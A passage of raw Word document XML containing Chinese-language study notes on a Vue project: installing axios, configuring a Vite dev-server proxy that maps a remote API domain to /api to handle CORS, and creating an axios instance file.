          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidR="006E5D70" w:rsidRPr="006E5D70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> catch</w:t>
      </w:r>
      <w:r w:rsidR="006E5D70" w:rsidRPr="006E5D70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E5D70" w:rsidRPr="006E5D70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="006E5D70" w:rsidRPr="006E5D70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E5D70" w:rsidRPr="006E5D70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>此处是根据目标网站相应码来决定的，不是根据</w:t>
      </w:r>
      <w:r w:rsidR="006E5D70" w:rsidRPr="006E5D70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:r w:rsidR="006E5D70" w:rsidRPr="006E5D70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>内容决定的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F968969" w14:textId="77777777" w:rsidR="00BE1417" w:rsidRDefault="00BE1417" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5440E9D2" w14:textId="1724D0D1" w:rsidR="00BE1417" w:rsidRPr="00DE164E" w:rsidRDefault="00DE164E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE164E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>np</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE164E">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>m install axios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5337364E" w14:textId="77777777" w:rsidR="003D73B1" w:rsidRDefault="003D73B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="082B3584" w14:textId="578BD85C" w:rsidR="003D73B1" w:rsidRDefault="00DE164E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>xios</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的官方文档：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB0C0FF" w14:textId="625EDBE1" w:rsidR="003D73B1" w:rsidRDefault="00DE164E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DE164E">
        <w:t>http://www.axios-js.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E8F1BF" w14:textId="18706530" w:rsidR="003D73B1" w:rsidRDefault="00201E67" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00201E67">
        <w:t>http://www.axios-js.com/zh-cn/docs/#%E5%88%9B%E5%BB%BA%E5%AE%9E%E4%BE%8B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FCFD1A" w14:textId="77777777" w:rsidR="00DE164E" w:rsidRDefault="00DE164E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7078EF0A" w14:textId="5A265F8A" w:rsidR="00C75A75" w:rsidRDefault="00C75A75" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vite</w:t>
      </w:r>
      <w:r>
        <w:t>.config.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置跨域问题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CORS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E0D3C2" w14:textId="77777777" w:rsidR="00C75A75" w:rsidRDefault="00C75A75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="682901A8" w14:textId="56968E68" w:rsidR="00A77BE8" w:rsidRPr="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>由于要向别的网站进行请求，会涉及跨域问题，参考</w:t>
      </w:r>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>vite</w:t>
      </w:r>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>官网的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>server.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45097363" w14:textId="20C1DB82" w:rsidR="00A77BE8" w:rsidRPr="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>https://vitejs.dev/config/server-options.html#server-proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8F0E6A" w14:textId="23EBC72A" w:rsidR="006E5D70" w:rsidRPr="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>看代码，将目标网站</w:t>
      </w:r>
      <w:hyperlink r:id="rId197" w:history="1">
        <w:r w:rsidRPr="00A77BE8">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:color w:val="FF0000"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>http://dishaxy.dishait.cn</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>重命名为</w:t>
      </w:r>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，因此在后续代码关于此域名字符串，可以统一使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">'/api' </w:t>
      </w:r>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>来替代</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79092EA1" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRPr="00C75A75" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17487E83" w14:textId="77777777" w:rsidR="00C75A75" w:rsidRDefault="00C75A75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { defineConfig } from 'vite'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532A142C" w14:textId="77777777" w:rsidR="00C75A75" w:rsidRDefault="00C75A75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import vue from '@vitejs/plugin-vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1054B8C0" w14:textId="77777777" w:rsidR="00C75A75" w:rsidRDefault="00C75A75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import WindiCSS from 'vite-plugin-windicss'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D404C48" w14:textId="77777777" w:rsidR="00C75A75" w:rsidRDefault="00C75A75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46BB3847" w14:textId="77777777" w:rsidR="00C75A75" w:rsidRDefault="00C75A75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import path from 'path'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176AD8A2" w14:textId="77777777" w:rsidR="00C75A75" w:rsidRDefault="00C75A75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79057459" w14:textId="77777777" w:rsidR="00C75A75" w:rsidRDefault="00C75A75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>// https://vitejs.dev/config/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614D6EB2" w14:textId="77777777" w:rsidR="00C75A75" w:rsidRDefault="00C75A75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>export default defineConfig({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729C7FF2" w14:textId="77777777" w:rsidR="00C75A75" w:rsidRDefault="00C75A75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  resolve: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E56C95" w14:textId="77777777" w:rsidR="00C75A75" w:rsidRDefault="00C75A75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    alias: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14839222" w14:textId="77777777" w:rsidR="00C75A75" w:rsidRDefault="00C75A75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      "~": path.resolve(__dirname, "./src"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1689DB86" w14:textId="77777777" w:rsidR="00C75A75" w:rsidRDefault="00C75A75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B76DDC" w14:textId="77777777" w:rsidR="00C75A75" w:rsidRDefault="00C75A75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FE6405" w14:textId="77777777" w:rsidR="00C75A75" w:rsidRDefault="00C75A75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E4FD827" w14:textId="77777777" w:rsidR="00C75A75" w:rsidRPr="00C75A75" w:rsidRDefault="00C75A75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00C75A75">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>server: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78241CD1" w14:textId="77777777" w:rsidR="00C75A75" w:rsidRPr="00C75A75" w:rsidRDefault="00C75A75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75A75">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    proxy: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C72772A" w14:textId="77777777" w:rsidR="00C75A75" w:rsidRDefault="00C75A75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75A75">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">      '/api': {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68149106" w14:textId="0840BC0C" w:rsidR="00B321EC" w:rsidRPr="00B321EC" w:rsidRDefault="00B321EC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B321EC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>target: '' http://ceshi13.dishait.cn/,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5235D6" w14:textId="70A43E42" w:rsidR="00C75A75" w:rsidRPr="00C75A75" w:rsidRDefault="00C75A75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75A75">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidR="00B321EC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00B321EC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>不是这个</w:t>
      </w:r>
      <w:r w:rsidR="00B321EC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C75A75">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>target: 'http://dishaxy.dishait.cn',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E839B1" w14:textId="77777777" w:rsidR="00C75A75" w:rsidRPr="00C75A75" w:rsidRDefault="00C75A75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75A75">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        changeOrigin: true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FA2B53" w14:textId="77777777" w:rsidR="00C75A75" w:rsidRPr="00C75A75" w:rsidRDefault="00C75A75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75A75">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        rewrite: (path) =&gt; path.replace(/^\/api/, ''),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755CB177" w14:textId="77777777" w:rsidR="00C75A75" w:rsidRPr="00C75A75" w:rsidRDefault="00C75A75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75A75">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">      },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001129C8" w14:textId="77777777" w:rsidR="00C75A75" w:rsidRPr="00C75A75" w:rsidRDefault="00C75A75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75A75">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7C9854" w14:textId="77777777" w:rsidR="00C75A75" w:rsidRDefault="00C75A75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C75A75">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEC8A9D" w14:textId="77777777" w:rsidR="00C75A75" w:rsidRDefault="00C75A75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="508E5DB6" w14:textId="77777777" w:rsidR="00C75A75" w:rsidRDefault="00C75A75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  plugins: [vue(),WindiCSS()],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A33F912" w14:textId="00ADDD32" w:rsidR="00C75A75" w:rsidRDefault="00C75A75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2504D0BE" w14:textId="77777777" w:rsidR="00C75A75" w:rsidRDefault="00C75A75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="677AE390" w14:textId="77777777" w:rsidR="00C75A75" w:rsidRDefault="00C75A75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F869BEB" w14:textId="718B89B9" w:rsidR="00DE164E" w:rsidRDefault="000F191C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>rc/axios.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A187F88" w14:textId="25367D02" w:rsidR="00DE164E" w:rsidRPr="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>vite</w:t>
      </w:r>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>没有配置该域名的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>的重命名，本应如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17406B8A" w14:textId="77777777" w:rsidR="000F191C" w:rsidRPr="00A77BE8" w:rsidRDefault="000F191C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import axios from "axios"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6A4AF3" w14:textId="77777777" w:rsidR="000F191C" w:rsidRPr="00A77BE8" w:rsidRDefault="000F191C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11CA2080" w14:textId="77777777" w:rsidR="000F191C" w:rsidRPr="00A77BE8" w:rsidRDefault="000F191C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>const service = axios.create({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124D8846" w14:textId="77777777" w:rsidR="000F191C" w:rsidRPr="00A77BE8" w:rsidRDefault="000F191C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    baseURL: "http://dishaxy.dishait.cn",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43719AA1" w14:textId="77777777" w:rsidR="000F191C" w:rsidRPr="00A77BE8" w:rsidRDefault="000F191C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7845EAFA" w14:textId="77777777" w:rsidR="000F191C" w:rsidRPr="00A77BE8" w:rsidRDefault="000F191C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28E1533C" w14:textId="2D546684" w:rsidR="00DE164E" w:rsidRDefault="000F191C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>export default service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6742DB91" w14:textId="77777777" w:rsidR="00DE164E" w:rsidRDefault="00DE164E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="135FF03C" w14:textId="7A2A1688" w:rsidR="00A77BE8" w:rsidRPr="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>配置域名的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>重命名后，代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26616826" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRPr="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import axios from "axios"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E54FFA" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRPr="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5539D8F3" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRPr="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const service = axios.create({</w:t>
      </w:r>
    </w:p>
